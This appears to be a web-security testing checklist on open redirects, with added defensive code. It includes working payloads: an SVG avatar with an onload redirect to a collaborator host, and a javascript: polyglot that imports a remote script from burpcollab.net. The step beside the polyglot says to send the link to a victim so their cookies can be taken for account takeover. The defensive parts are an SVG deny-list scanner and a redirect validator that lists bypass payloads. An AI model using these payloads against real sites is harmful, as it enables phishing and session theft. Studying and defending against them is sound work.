Client Side URL Redirect

Check List

Methodology

Black Box

Open Redirect via Logout Redirect Parameter

1. Open the target application.
2. Log in using your email and password.
3. Verify your mobile OTP.
4. You will be redirected to https://example.com/?landing_uri=example.com. Note the parameter that carries the post-login destination.
5. Now modify the URL so that the redirect parameter points to an external host, for example https://example.com/logout?redirect_uri=https://evil.com
6. Upon visiting this URL, you are redirected to https://evil.com without any validation or warning: the redirect parameter accepts an arbitrary external URL, so Open Redirect is confirmed.


Open Redirect via Parameter Chaining

1. Log in to the target site and complete the registration process.
2. Then use Burp Suite to trace the requests and check whether you see a parameter called continue= or next= that carries a URL value, like the request below:
   https://myaccount.example.com/security-checkup/1?continue=https://accounts.examplew.com/...
3. Copy the full original URL and use it as the value of continue=, appending your payload as a nested second continue= parameter. The outer value points back at the same host, so a check that only validates the first hop passes it, and the inner value is what the second hop redirects to:
   https://myaccount.example.com/security-checkup/1?continue=https://myaccount.example.com/security-checkup/1?continue=https://evil.com
4. Open the crafted URL while logged in.
5. Click the "Continue" button (or any button that triggers the redirect).
6. If you land on https://evil.com, Open Redirect via parameter chaining is confirmed.


Open Redirect via Image Upload

1. Go to any profile picture, avatar, logo, or image upload feature on the target.
2. Create this exact SVG file locally (save as redirect.svg):

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://0vwsb0oeappr3l1za7as1agllcr3fy3n.oastify.com'" xmlns="http://www.w3.org/2000/svg">
  <rect width="100" height="100" fill="red"/>
</svg>

3. Go back to the upload feature and upload redirect.svg as your new profile picture/avatar.
4. Intercept the upload POST request with Burp Suite.
5. If needed, change Content-Type to image/svg+xml or remove it entirely.
6. Complete the upload.
7. Now go to Collaborator in Burp Suite and check whether an interaction has arrived, or open your profile page (or the profile of anyone who can view your avatar). If you are instantly redirected to your Collaborator host (the oastify.com address in the payload), Open Redirect via SVG Avatar is confirmed. Note that browsers do not run scripts inside an SVG loaded through an <img> tag; the onload handler only fires where the uploaded file is rendered as a document, for example by navigating to its URL directly on the target's origin.
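The upload-side check that stops the redirect.svg above from ever being stored, as an added example that is not part of the original checklist. It is a deny-list scan of the raw SVG text for script elements, event-handler attributes, javascript: URLs and <foreignObject>, run after numeric entities are decoded so that &#x6A;avascript: is seen as javascript:. Plain Node.js with no dependencies; the function names and the sample files other than redirect.svg are constructed for this example.

```javascript
// Added example, not part of the original checklist: a server-side gate for
// SVG avatar uploads. The redirect.svg from the steps above carries its payload
// in an onload= attribute; this scanner flags SVG text that contains script,
// event-handler attributes, javascript: URLs or <foreignObject> before the
// file is stored. Node.js, no dependencies. Function names are hypothetical.

// Deny-list of active-content markers. Comments are deliberately NOT stripped
// before matching: a false positive on a commented-out onload= is cheaper than
// trusting our idea of what the browser will treat as a comment.
const ACTIVE_CONTENT_PATTERNS = [
  { name: 'script element',  re: /<\s*script\b/i },
  { name: 'event handler',   re: /<[^>]*\son[a-z]+\s*=/i },   // onload=, onclick=, ... inside a tag
  { name: 'javascript: URL', re: /javascript\s*:/i },          // href / xlink:href targets
  { name: 'foreignObject',   re: /<\s*foreignObject\b/i },    // embeds arbitrary HTML
];

// Collapse numeric character references (&#x6A; / &#106;) so encoded keywords
// cannot slip past the patterns. Code points above U+10FFFF are invalid.
function decodeNumericEntities(text) {
  const toChar = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : '\ufffd');
  return text
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, hex) => toChar(parseInt(hex, 16)))
    .replace(/&#(\d{1,7});?/g, (_, dec) => toChar(parseInt(dec, 10)));
}

// Returns the names of every marker found; an empty array means nothing was flagged.
function svgActiveContentFindings(svgText) {
  const normalized = decodeNumericEntities(svgText);
  return ACTIVE_CONTENT_PATTERNS
    .filter(({ re }) => re.test(normalized))
    .map(({ name }) => name);
}

// The upload handler's decision: store the file only if nothing was flagged.
function acceptSvgUpload(svgText) {
  return svgActiveContentFindings(svgText).length === 0;
}

// Constructed samples: the checklist's redirect.svg, a benign avatar, and an
// entity-obfuscated javascript: link.
const REDIRECT_SVG = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://0vwsb0oeappr3l1za7as1agllcr3fy3n.oastify.com'" xmlns="http://www.w3.org/2000/svg">
  <rect width="100" height="100" fill="red"/>
</svg>`;
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
</svg>`;
const ENTITY_SVG = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="&#x6A;avascript:alert(document.domain)"><rect width="100" height="100"/></a>
</svg>`;

for (const [label, svg] of Object.entries({ REDIRECT_SVG, BENIGN_SVG, ENTITY_SVG })) {
  const verdict = acceptSvgUpload(svg)
    ? 'accepted'
    : `rejected: ${svgActiveContentFindings(svg).join(', ')}`;
  console.log(label, verdict);
}
```

A deny-list like this is a gate, not a sanitizer, and it only matters because the file is served back inline from the target's origin with an SVG content type. The stronger fixes are to rasterize avatars to PNG on upload, or to serve user uploads from a separate origin and with Content-Disposition: attachment, so that even an SVG that slips through cannot run in the application's origin.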


Open Redirect Escalated to XSS

1. Go to the login page or any sign-in/auth page and look for redirect parameters.
2. Test a basic open redirect first:
   https://target.com/auth/signin?redirect=https://evil.com
3. If you land on evil.com after login, Open Redirect is confirmed. Now escalate to XSS by supplying a javascript: URL as the redirect target:
   https://target.com/auth/signin?redirect=javascript:alert(1)
4. If the alert pops after clicking "Sign in", direct JavaScript execution is confirmed.
5. If it is filtered, try the double-encoded newline bypass:
   https://target.com/auth/signin?redirect=javascript://%250Aalert(1)
   or the widely used polyglot payload below, which survives many filters and HTML contexts:
   https://target.com/auth/signin?redirect=JavaScript://%250A/*?%27/*\%27/*%22/*\%22/*`/*\`/*%26apos;)/*%3C!--%3E%3C/Title/%3C/Style/%3C/Script/%3C/textArea/%3C/iFrame/%3C/noScript%3E\74k%3CK/contentEditable/autoFocus/OnFocus=/${/*/;{/**/(import(/https:\\burpcollab.net/.source))}}//\76--%3E
6. Send this exact link to the victim, for example:
   https://target.com/auth/signin?redirect=JavaScript://%250A/*?%27/*\%27/*%22/*\%22/*`/*\`/*%26apos;)/*%3C!--%3E%3C/Title/%3C/Style/%3C/Script/%3C/textArea/%3C/iFrame/%3C/noScript%3E\74k%3CK/contentEditable/autoFocus/OnFocus=/${/*/;{/**/(import(/https:\\burpcollab.net/.source))}}//\76--%3E
7. The victim clicks, logs in and is silently redirected to the javascript: URL, which imports a script from your server (burpcollab.net in the payload above). That script runs in the target's origin, so it can read the DOM, localStorage and any cookies not flagged HttpOnly and send them to you; where the session token is exposed that way, Account Takeover follows.
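The redirect-target validation that would close every finding in the three redirect-parameter procedures above (the logout redirect_uri, the chained continue= parameters and the javascript: escalation of redirect=), shown next to a naive check of the kind that lets them through. This is an added example, not code from the original checklist or from any target described on it. It runs under Node.js or in a browser; URL is the WHATWG parser built into both, and the origin, parameter name and payload list are assumptions constructed for the example.

```javascript
// Added example, not part of the original checklist: the redirect-target
// validation that would close each finding above (logout redirect_uri,
// chained continue= parameters, javascript: URLs in redirect=), shown next
// to a naive check that lets them through. Node.js / browser JavaScript;
// `URL` is the WHATWG parser built into both. Host names are assumptions.

const SITE_ORIGIN = 'https://myaccount.example.com'; // assumed target origin
const FALLBACK = '/';                                // where rejected values land

// Naive check of the kind found in real code: accept values that begin with
// our origin, and treat anything that does not look like an http(s) URL as a
// relative path. It passes javascript:..., //evil.com and
// https://myaccount.example.com.evil.com/.
function naiveAllows(raw) {
  return raw.startsWith(SITE_ORIGIN) || !raw.startsWith('http');
}

// Hardened: parse with the same parser the browser will use, resolve relative
// values against our origin, require an exact origin match, and re-emit only
// path + query + fragment so the attacker's string never reaches Location.
function safeRedirectTarget(raw, fallback = FALLBACK) {
  if (typeof raw !== 'string' || raw === '') return fallback;
  let url;
  try {
    url = new URL(raw, SITE_ORIGIN);   // '//evil.com' and '/\evil.com' resolve to https://evil.com
  } catch {
    return fallback;                   // unparseable input is not a destination
  }
  // javascript:, data:, vbscript: have an opaque origin serialised as "null";
  // http:// (downgrade) and any other host fail the exact comparison.
  if (url.origin !== SITE_ORIGIN) return fallback;
  return url.pathname + url.search + url.hash;
}

// Parameter chaining: the outer continue= is same-origin and passes; the bug
// is the second hop not being validated. Running the same check at every hop
// stops the chain at the first off-site value.
function followContinueChain(raw, maxHops = 5) {
  const hops = [];
  let target = safeRedirectTarget(raw);
  for (let i = 0; i < maxHops; i++) {
    hops.push(target);
    const next = new URL(target, SITE_ORIGIN).searchParams.get('continue');
    if (next === null) break;
    target = safeRedirectTarget(next);
  }
  return hops;
}

// Constructed inputs: the payloads from the steps above plus the usual variants.
const REDIRECT_PAYLOADS = [
  '/dashboard?tab=security',                   // legitimate relative path
  'https://evil.com',                          // plain external host
  '//evil.com',                                // protocol-relative
  '/\\evil.com',                               // backslash, parsed as // by browsers
  'https://myaccount.example.com.evil.com/',   // prefix trick against startsWith
  'http://myaccount.example.com/',             // scheme downgrade
  'javascript:alert(1)',                       // direct script execution
  'javascript://%250Aalert(1)',                // the filter bypass from the checklist
];

// The chained continue= payload from the parameter-chaining procedure.
const CHAINED_PAYLOAD =
  'https://myaccount.example.com/security-checkup/1?continue=' +
  'https://myaccount.example.com/security-checkup/1?continue=https://evil.com';

for (const p of REDIRECT_PAYLOADS) {
  console.log(`${p.padEnd(44)} naive=${naiveAllows(p)}  hardened -> ${safeRedirectTarget(p)}`);
}
console.log('chain:', followContinueChain(CHAINED_PAYLOAD));
```

The design point is to never compare strings against the raw parameter: let the URL parser normalise the value (it is the parser the browser will apply to the Location header anyway), compare the resulting origin for equality, and emit a same-origin path rather than echoing the input. That single rule covers the external host, the protocol-relative and backslash forms, the host-prefix trick, the javascript: scheme and its %250A variant, and, applied on every hop, the continue= chain.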


White Box

Cheat Sheet